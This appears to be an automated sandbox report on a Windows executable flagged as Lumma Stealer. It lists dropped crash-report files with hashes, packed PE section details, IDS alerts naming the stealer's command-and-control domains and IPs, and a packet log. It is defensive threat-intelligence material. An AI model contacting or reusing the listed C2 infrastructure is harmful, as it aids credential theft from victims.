                                                                                                                      Preview:..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.B.E.X.....E.v.e.n.t.T.i.m.e.=.1.3.3.7.3.3.4.0.4.2.8.3.9.1.4.0.4.3.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....U.p.l.o.a.d.T.i.m.e.=.1.3.3.7.3.3.4.0.4.2.8.9.5.3.8.9.6.7.....R.e.p.o.r.t.S.t.a.t.u.s.=.5.2.4.3.8.4.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.b.6.8.3.2.5.3.6.-.f.e.b.d.-.4.f.4.0.-.8.f.1.e.-.e.1.8.d.f.6.7.f.5.0.a.c.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.c.0.d.d.3.4.f.d.-.5.b.d.e.-.4.a.f.a.-.8.b.1.3.-.8.e.6.c.3.d.5.2.e.4.3.0.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....W.o.w.6.4.G.u.e.s.t.=.3.3.2.....N.s.A.p.p.N.a.m.e.=.f.i.l.e...e.x.e.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.1.c.c.4.-.0.0.0.1.-.0.0.1.4.-.0.a.1.8.-.2.2.a.c.c.3.1.d.d.b.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.6.7.e.4.9.2.d.7.6.8.e.7.9.7.3.1.6.2.4.b.c.d.f.2.e.7.6.1.5.f.9.1.8.0.0.0.0.f.f.f.f.!.0.0.0.0.7.6.a.0.a.f.c.9.2.5.e.c.a.3.5.5.9.c.f.1.a.c.2.f.6.e.a.0.7.5.a.4.0.0.e.2.3.8.7.2.!.f.i.l.e...e.x.e.....T.a.r.g.e.t.A.p.p.V.e.r.=.2.0.2.4././.1.0././.0.4.:.

                                                                                                                      C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_file.exe_f1cc5b2e512f89f4cf16dd779fe2cb623cbd52_852b229c_0fa40af0-8a04-4bdb-bd9a-f587b97e2465\Report.wer

                                                                                                                      Download File
                                                                                                                      Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                      File Type:data
                                                                                                                      Category:dropped
                                                                                                                      Size (bytes):65536
                                                                                                                      Entropy (8bit):1.0304476820475297
                                                                                                                      Encrypted:false
                                                                                                                      SSDEEP:192:PwJYDINDvHPlT0Nvw4kP3juFuJQzHzuiFiZ24IO8TOB:jAHNANvwJjEzuiFiY4IO8C
                                                                                                                      MD5:DA7B7BD2B2EC8901E6410ADCF48FBCF3
                                                                                                                      SHA1:3C2BE5AAAFB6E6D17E3312E4A6FFEE0C6A9EEA1E
                                                                                                                      SHA-256:14D92F2AD19AA02CDD5B48DC53031638BD3AC3286BF6238CB9F68F1F22C0A57D
                                                                                                                      SHA-512:F66462670E6F348FBA808C0705D037811EA196C16D81474265E15AEB68A49F2B9D4E0B402C63E04995AC8683F5617F67E6C36F319C5CBB9FC950322CFE0CC656
                                                                                                                      Malicious:true
                                                                                                                      Reputation:low
                                                                                                                      Preview:..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.A.P.P.C.R.A.S.H.....E.v.e.n.t.T.i.m.e.=.1.3.3.7.3.3.3.4.0.2.4.5.0.6.3.1.0.6.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....U.p.l.o.a.d.T.i.m.e.=.1.3.3.7.3.3.3.4.0.2.5.0.0.6.3.0.5.6.....R.e.p.o.r.t.S.t.a.t.u.s.=.5.2.4.3.8.4.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.0.f.a.4.0.a.f.0.-.8.a.0.4.-.4.b.d.b.-.b.d.9.a.-.f.5.8.7.b.9.7.e.2.4.6.5.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.c.3.f.f.9.2.f.2.-.0.5.d.1.-.4.3.6.4.-.a.d.c.4.-.5.7.1.c.9.c.1.e.d.9.a.e.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....W.o.w.6.4.G.u.e.s.t.=.3.3.2.....N.s.A.p.p.N.a.m.e.=.f.i.l.e...e.x.e.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.1.c.c.4.-.0.0.0.1.-.0.0.1.4.-.0.a.1.8.-.2.2.a.c.c.3.1.d.d.b.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.6.7.e.4.9.2.d.7.6.8.e.7.9.7.3.1.6.2.4.b.c.d.f.2.e.7.6.1.5.f.9.1.8.0.0.0.0.f.f.f.f.!.0.0.0.0.7.6.a.0.a.f.c.9.2.5.e.c.a.3.5.5.9.c.f.1.a.c.2.f.6.e.a.0.7.5.a.4.0.0.e.2.3.8.7.2.!.f.i.l.e...e.x.e.....T.a.r.g.e.t.A.p.p.V.e.r.=.2.0.2.4././.1.0.

                                                                                                                      C:\ProgramData\Microsoft\Windows\WER\Temp\WER8144.tmp.dmp

                                                                                                                      Download File
                                                                                                                      Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                      File Type:Mini DuMP crash report, 15 streams, Sun Oct 13 23:00:24 2024, 0x1205a4 type
                                                                                                                      Category:dropped
                                                                                                                      Size (bytes):287876
                                                                                                                      Entropy (8bit):1.4765634861136927
                                                                                                                      Encrypted:false
                                                                                                                      SSDEEP:768:0plHABtHBanBU1jufpUjmHjxjvPHoYHPnWmw8Ug2uLbF:wuHBaajuROmj1vvxHPnWBfg2uLJ
                                                                                                                      MD5:C38B9C49E9A376714F0230748DD45847
                                                                                                                      SHA1:B1959DEBB275E614A734A7E746FB3D577CCCA2B3
                                                                                                                      SHA-256:570883E6CA66949B854DE4A76252E551D8E27DB348C09357404D77C5B4928651
                                                                                                                      SHA-512:7005F62553814C02169DADB4AAE659AA2A390A68EEB9D9CAABFACBFE3EC2CF6B72567B35BADA22C3F249E2BAD8F20D38EBE29828D2DCB61518FA646DB6F58342
                                                                                                                      Malicious:false
                                                                                                                      Reputation:low
                                                                                                                      Preview:MDMP..a..... ........Q.g........................T................&......................`.......8...........T...........`K..$............'...........)..............................................................................eJ......|*......GenuineIntel............T............Q.g.............................0..2...........,...E.a.s.t.e.r.n. .S.t.a.n.d.a.r.d. .T.i.m.e...........................................E.a.s.t.e.r.n. .S.u.m.m.e.r. .T.i.m.e...............................................1.9.0.4.1...1...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.......................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                      C:\ProgramData\Microsoft\Windows\WER\Temp\WER827D.tmp.WERInternalMetadata.xml

                                                                                                                      Download File
                                                                                                                      Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                      File Type:XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                                                                      Category:dropped
                                                                                                                      Size (bytes):8314
                                                                                                                      Entropy (8bit):3.6923324689761365
                                                                                                                      Encrypted:false
                                                                                                                      SSDEEP:192:R6l7wVeJiCL6xK6YNLSU9hTouxgmfBSibQQpr689bCzsfLu2m:R6lXJd6xK6YRSU9hLxgmfQUhCYfL2
                                                                                                                      MD5:F05AE428A2A368AFF8D56CAD3A9D0979
                                                                                                                      SHA1:59C2C9985C5BDF416D533D1DAC2AD8CA9D675870
                                                                                                                      SHA-256:D1A3ACA2EDFD3A53869856ED785629880610103A86D8974C6515238614B641CF
                                                                                                                      SHA-512:6565714AB5AB13A9F20BC55B1C7EAFAB67B9A10FD9EF60FC5E3893BFD6D2CD12A96D50C3198C91750708519E65D983D3AB0F98290AF82CB4E837B75F7D1ABA24
                                                                                                                      Malicious:false
                                                                                                                      Reputation:low
                                                                                                                      Preview:..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.9.0.4.5.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.9.0.4.1...2.0.0.6...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.2.0.0.6.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.2.0.5.7.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.7.3.6.4.<./.P.i.

                                                                                                                      C:\ProgramData\Microsoft\Windows\WER\Temp\WER829E.tmp.xml

                                                                                                                      Download File
                                                                                                                      Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                      File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                      Category:dropped
                                                                                                                      Size (bytes):4564
                                                                                                                      Entropy (8bit):4.434122322703362
                                                                                                                      Encrypted:false
                                                                                                                      SSDEEP:48:cvIwWl8zsWJg77aI9aFWpW8VYdYm8M4JjFFba+q8ObXY1VQ0/9d:uIjfsI7c07VNJ3aRUVH/9d
                                                                                                                      MD5:6DBDDBF5DBD576AFBAD79A1D67622A9A
                                                                                                                      SHA1:54C26B82B4C464C98C7508BD1FFFE241C4EBFD71
                                                                                                                      SHA-256:A93278D9F27F431F61B9CD476D4672F6A41D748139F6154FE24A07E0F03E56E1
                                                                                                                      SHA-512:1771A5410E25B2ADB4ED96595FFAB31477BC16E2677FF196758E01702964A14CE0AD630595B1E75A7964F8A4DCB744255025F9332B857C574E4C9DC8F3058D2F
                                                                                                                      Malicious:false
                                                                                                                      Reputation:low
                                                                                                                      Preview:<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="19045" />.. <arg nm="vercsdbld" val="2006" />.. <arg nm="verqfe" val="2006" />.. <arg nm="csdbld" val="2006" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="2057" />.. <arg nm="geoid" val="223" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="542283" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.789.19041.0-11.0.1000" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="409

                                                                                                                      C:\ProgramData\Microsoft\Windows\WER\Temp\WERC6D8.tmp.dmp

                                                                                                                      Download File
                                                                                                                      Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                      File Type:Mini DuMP crash report, 15 streams, Mon Oct 14 00:47:08 2024, 0x1205a4 type
                                                                                                                      Category:dropped
                                                                                                                      Size (bytes):292434
                                                                                                                      Entropy (8bit):1.4980696857164
                                                                                                                      Encrypted:false
                                                                                                                      SSDEEP:768:OplyABEBAJanBtjufpDxWHjxTvxHoeHPBrbmw8UgfUu:u8AJaLjuRtWjlvtvHPB3BfgfUu
                                                                                                                      MD5:2F059E0E3975981DD95EC4BC66C7CEE3
                                                                                                                      SHA1:06FD5BF5F3921D0381D85CDE40442874563F53B7
                                                                                                                      SHA-256:131D3485A66FA6F06EDFC8454CB944D5646F8D007F4B139C7BFBA17206CF2A38
                                                                                                                      SHA-512:0433126CC8214906CF45C6F91BF78BF0D28995653340A93BB6906E55E6794EC03A9D0951770239E399CB873AA8BC8C6D615D1AD9C67A12528663B72FD5CF18E4
                                                                                                                      Malicious:false
                                                                                                                      Reputation:low
                                                                                                                      Preview:MDMP..a..... ........j.g........................T................&......................`.......8...........T............L..R*...........'...........)..............................................................................eJ......|*......GenuineIntel............T............Q.g.............................0..2...........,...E.a.s.t.e.r.n. .S.t.a.n.d.a.r.d. .T.i.m.e...........................................E.a.s.t.e.r.n. .S.u.m.m.e.r. .T.i.m.e...............................................1.9.0.4.1...1...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.......................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                      C:\ProgramData\Microsoft\Windows\WER\Temp\WERC7E3.tmp.WERInternalMetadata.xml

                                                                                                                      Download File
                                                                                                                      Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                      File Type:XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                                                                      Category:dropped
                                                                                                                      Size (bytes):8368
                                                                                                                      Entropy (8bit):3.683934783301814
                                                                                                                      Encrypted:false
                                                                                                                      SSDEEP:192:R6l7wVeJiCc6xh6YNKSU90Egmf6YJPupD3q89bBzsf28Lm:R6lXJa6xh6YwSU90EgmfJJPABYf2t
                                                                                                                      MD5:95932CF5DF4E60932A3E127C1DEA2427
                                                                                                                      SHA1:9371566574AA273D0F8DDE4D06CB2DA910EA5234
                                                                                                                      SHA-256:3339B35F7D7E980A743510FB359F589778C3A312905F89542F925336CFE8FD08
                                                                                                                      SHA-512:BF48AB9567BC695B082A4FD9D5E05688335D1C6E1374103580CD12129EED4840647BC6AC41B93494CDC736FF86B9A47085EA73319858E9E06A1C723BA4405587
                                                                                                                      Malicious:false
                                                                                                                      Reputation:low
                                                                                                                      Preview:..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.9.0.4.5.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.9.0.4.1...2.0.0.6...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.2.0.0.6.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.2.0.5.7.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.7.3.6.4.<./.P.i.

                                                                                                                      C:\ProgramData\Microsoft\Windows\WER\Temp\WERC803.tmp.xml

                                                                                                                      Download File
                                                                                                                      Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                      File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                      Category:dropped
                                                                                                                      Size (bytes):4661
                                                                                                                      Entropy (8bit):4.413324218906941
                                                                                                                      Encrypted:false
                                                                                                                      SSDEEP:48:cvIwWl8zs7Jg77aI9aFWpW8VYavYm8M4JjhFqo+q8vUvXY1VQ0/9d:uIjfVI7c07VVyJCoKwUVH/9d
                                                                                                                      MD5:55B0770C86E13AD15188A62512E133E1
                                                                                                                      SHA1:AD043ADA74EDD94731D27DAB9318B3B02784EF62
                                                                                                                      SHA-256:9C43C682AC9E27F26D8986932DEA5BD6787D6540CD072D16990C4BDCFDDD542A
                                                                                                                      SHA-512:CFA55190B61C701270BB0A4915D26A7D4CBD7E7022FC73E57A166B97FC699B7D66A35DC1D3C3C4FFFCBB0CD14297125B7F6F44558DDFFF9D3B869EFE7557F687
                                                                                                                      Malicious:false
                                                                                                                      Reputation:low
                                                                                                                      Preview:<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="19045" />.. <arg nm="vercsdbld" val="2006" />.. <arg nm="verqfe" val="2006" />.. <arg nm="csdbld" val="2006" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="2057" />.. <arg nm="geoid" val="223" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="542389" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.789.19041.0-11.0.1000" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="409

                                                                                                                      C:\Windows\appcompat\Programs\Amcache.hve

                                                                                                                      Download File
                                                                                                                      Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                      File Type:MS Windows registry file, NT/2000 or above
                                                                                                                      Category:dropped
                                                                                                                      Size (bytes):1835008
                                                                                                                      Entropy (8bit):4.416530754880836
                                                                                                                      Encrypted:false
                                                                                                                      SSDEEP:6144:Gcifpi6ceLPL9skLmb0moSWSPtaJG8nAgex285i2MMhA20X4WABlGuN85+:ji58oSWIZBk2MM6AFBqo
                                                                                                                      MD5:1ACE99209B07C5E350CEBE2B450BAF36
                                                                                                                      SHA1:4F6639A0D9C4BDD09DBFB66C6BA29AB16CD1A7CC
                                                                                                                      SHA-256:87F23793EC1F60B16E5B9E7798D3AB6D36B43FC7B2CC05E0D361D97C1614D6E8
                                                                                                                      SHA-512:01F9CB91ACF9256373389E585971CE7D89649A908E054D2E38D2FCB59C217C2C405A0EC7C7867C2A20487F46AD8A1A959B9C1499FC809E5DBA204C9D5632509C
                                                                                                                      Malicious:false
                                                                                                                      Reputation:low
                                                                                                                      Preview:regfF...F....\.Z.................... ...........\.A.p.p.C.o.m.p.a.t.\.P.r.o.g.r.a.m.s.\.A.m.c.a.c.h.e...h.v.e....c...b...#.......c...b...#...........c...b...#......rmtm...................................................................................................................................................................................................................................................................................................................................................F.........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                      Static File Info

                                                                                                                      General

                                                                                                                      File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                      Entropy (8bit):6.500018382122864
                                                                                                                      TrID:
                                                                                                                      • Win32 Executable (generic) a (10002005/4) 99.96%
                                                                                                                      • Generic Win/DOS Executable (2004/3) 0.02%
                                                                                                                      • DOS Executable Generic (2002/1) 0.02%
                                                                                                                      • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                                                                                      File name:file.exe
                                                                                                                      File size:3'038'720 bytes
                                                                                                                      MD5:3375809439f79695facbf3d39d867a8b
                                                                                                                      SHA1:76a0afc925eca3559cf1ac2f6ea075a400e23872
                                                                                                                      SHA256:06ea4b2a5e863208830bdfed5039b89fc600dfc0ca461d4afef57b331a876054
                                                                                                                      SHA512:5f0dabcc46d1b176edcd93c7509b30f0e2bf4eaa80cd4f301bd4d290ff0280403cd46d2f341b482468b7bfb9b27883607793f9450cc02f8c01f8ce55daa74c24
                                                                                                                      SSDEEP:49152:2yXAHU2MyakLaIohePROZxJ3q2i8GSTB4zv8j/Ndbop:IFMypaIosPROZxZi2Bvj/N
                                                                                                                      TLSH:F2E54A92B44972CFE49E2A78C12BCE435D6D02B9471089C7AC6CB4BF7E77CC115A5E28
                                                                                                                      File Content Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L...J..f..............................1...........@...........................2.....I./...@.................................W...k..

                                                                                                                      File Icon

                                                                                                                      Icon Hash:00928e8e8686b000

                                                                                                                      Static PE Info

                                                                                                                      General

                                                                                                                      Entrypoint:0x71e000
                                                                                                                      Entrypoint Section:.taggant
                                                                                                                      Digitally signed:false
                                                                                                                      Imagebase:0x400000
                                                                                                                      Subsystem:windows gui
                                                                                                                      Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                                                                                                                      DLL Characteristics:DYNAMIC_BASE, TERMINAL_SERVER_AWARE
                                                                                                                      Time Stamp:0x66FFF14A [Fri Oct 4 13:44:42 2024 UTC]
                                                                                                                      TLS Callbacks:
                                                                                                                      CLR (.Net) Version:
                                                                                                                      OS Version Major:6
                                                                                                                      OS Version Minor:0
                                                                                                                      File Version Major:6
                                                                                                                      File Version Minor:0
                                                                                                                      Subsystem Version Major:6
                                                                                                                      Subsystem Version Minor:0
                                                                                                                      Import Hash:2eabe9054cad5152567f0699947a2c5b

                                                                                                                      Entrypoint Preview

                                                                                                                      Instruction
                                                                                                                      jmp 00007F713475F2AAh

                                                                                                                      Data Directories

                                                                                                                      NameVirtual AddressVirtual Size Is in Section
                                                                                                                      IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                                                                                      IMAGE_DIRECTORY_ENTRY_IMPORT0x5f0570x6b.idata
                                                                                                                      IMAGE_DIRECTORY_ENTRY_RESOURCE0x00x0
                                                                                                                      IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                                                                      IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                                                                                      IMAGE_DIRECTORY_ENTRY_BASERELOC0x5f1f80x8.idata
                                                                                                                      IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                                                                                                      IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                                                                      IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                                                                      IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                                                                                      IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                                                                                      IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                                                                      IMAGE_DIRECTORY_ENTRY_IAT0x00x0
                                                                                                                      IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                                                                      IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                                                                                      IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                                                                                                      Sections

                                                                                                                      NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                                                                      0x10000x5d0000x25e003c65611869b3803fe22451f261155db2False0.9994069719471947data7.97814646144193IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                                      .rsrc 0x5e0000x10000x0d41d8cd98f00b204e9800998ecf8427eFalse0empty0.0IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                                      .idata 0x5f0000x10000x200fe72def8b74193a84232a780098a7ce0False0.150390625data1.04205214219471IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                                      mygwdovz0x600000x2bd0000x2bc80079d1b9d9d7ea0f6bd09191af3c234bc8unknownunknownunknownunknownIMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                                      wmjjbofb0x31d0000x10000x400d45b142cf633febc05df3fabcb4d56caFalse0.7265625data5.782632307815027IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                                      .taggant0x31e0000x30000x2200b46f1b6d1cfc84029c86b78ea5e1e64bFalse0.021254595588235295DOS executable (COM)0.17759661163391305IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE

                                                                                                                      Imports

                                                                                                                      DLLImport
                                                                                                                      kernel32.dlllstrcpy

                                                                                                                      Network Behavior

                                                                                                                      Suricata IDS Alerts

                                                                                                                      TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                                                                                                      2024-10-14T01:00:21.629425+02002056471ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (clearancek .site)1192.168.2.7558791.1.1.153UDP
                                                                                                                      2024-10-14T01:00:21.647977+02002056485ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (mobbipenju .store)1192.168.2.7562391.1.1.153UDP
                                                                                                                      2024-10-14T01:00:21.658747+02002056483ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (eaglepawnoy .store)1192.168.2.7553641.1.1.153UDP
                                                                                                                      2024-10-14T01:00:21.668647+02002056481ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (dissapoiznw .store)1192.168.2.7520841.1.1.153UDP
                                                                                                                      2024-10-14T01:00:21.679813+02002056479ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (studennotediw .store)1192.168.2.7545811.1.1.153UDP
                                                                                                                      2024-10-14T01:00:21.690873+02002056477ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (bathdoomgaz .store)1192.168.2.7626651.1.1.153UDP
                                                                                                                      2024-10-14T01:00:21.702075+02002056475ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (spirittunek .store)1192.168.2.7530591.1.1.153UDP
                                                                                                                      2024-10-14T01:00:21.713055+02002056473ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (licendfilteo .site)1192.168.2.7595351.1.1.153UDP
                                                                                                                      2024-10-14T01:00:23.196061+02002858666ETPRO MALWARE Win32/Lumma Stealer Steam Profile Lookup1192.168.2.749704104.102.49.254443TCP
                                                                                                                      2024-10-14T01:00:23.975377+02002049836ET MALWARE Lumma Stealer Related Activity1192.168.2.749715172.67.206.204443TCP
                                                                                                                      2024-10-14T01:00:23.975377+02002054653ET MALWARE Lumma Stealer CnC Host Checkin1192.168.2.749715172.67.206.204443TCP
                                                                                                                      2024-10-14T01:00:25.168274+02002049812ET MALWARE Lumma Stealer Related Activity M21192.168.2.749721172.67.206.204443TCP
                                                                                                                      2024-10-14T01:00:25.168274+02002054653ET MALWARE Lumma Stealer CnC Host Checkin1192.168.2.749721172.67.206.204443TCP

                                                                                                                      Network Port Distribution

                                                                                                                      TCP Packets

                                                                                                                      TimestampSource PortDest PortSource IPDest IP
                                                                                                                      Oct 14, 2024 01:00:21.743087053 CEST49704443192.168.2.7104.102.49.254
                                                                                                                      Oct 14, 2024 01:00:21.743120909 CEST44349704104.102.49.254192.168.2.7
                                                                                                                      Oct 14, 2024 01:00:21.743190050 CEST49704443192.168.2.7104.102.49.254
                                                                                                                      Oct 14, 2024 01:00:21.748963118 CEST49704443192.168.2.7104.102.49.254
                                                                                                                      Oct 14, 2024 01:00:21.748987913 CEST44349704104.102.49.254192.168.2.7
                                                                                                                      Oct 14, 2024 01:00:22.460774899 CEST44349704104.102.49.254192.168.2.7
                                                                                                                      Oct 14, 2024 01:00:22.460865974 CEST49704443192.168.2.7104.102.49.254
                                                                                                                      Oct 14, 2024 01:00:22.465126038 CEST49704443192.168.2.7104.102.49.254
                                                                                                                      Oct 14, 2024 01:00:22.465140104 CEST44349704104.102.49.254192.168.2.7
                                                                                                                      Oct 14, 2024 01:00:22.465420008 CEST44349704104.102.49.254192.168.2.7
                                                                                                                      Oct 14, 2024 01:00:22.510488033 CEST49704443192.168.2.7104.102.49.254
                                                                                                                      Oct 14, 2024 01:00:22.513673067 CEST49704443192.168.2.7104.102.49.254
                                                                                                                      Oct 14, 2024 01:00:22.559398890 CEST44349704104.102.49.254192.168.2.7
                                                                                                                      Oct 14, 2024 01:00:23.195902109 CEST44349704104.102.49.254192.168.2.7
                                                                                                                      Oct 14, 2024 01:00:23.195933104 CEST44349704104.102.49.254192.168.2.7
                                                                                                                      Oct 14, 2024 01:00:23.195974112 CEST49704443192.168.2.7104.102.49.254
                                                                                                                      Oct 14, 2024 01:00:23.195986986 CEST44349704104.102.49.254192.168.2.7
                                                                                                                      Oct 14, 2024 01:00:23.196027040 CEST44349704104.102.49.254192.168.2.7
                                                                                                                      Oct 14, 2024 01:00:23.196054935 CEST44349704104.102.49.254192.168.2.7
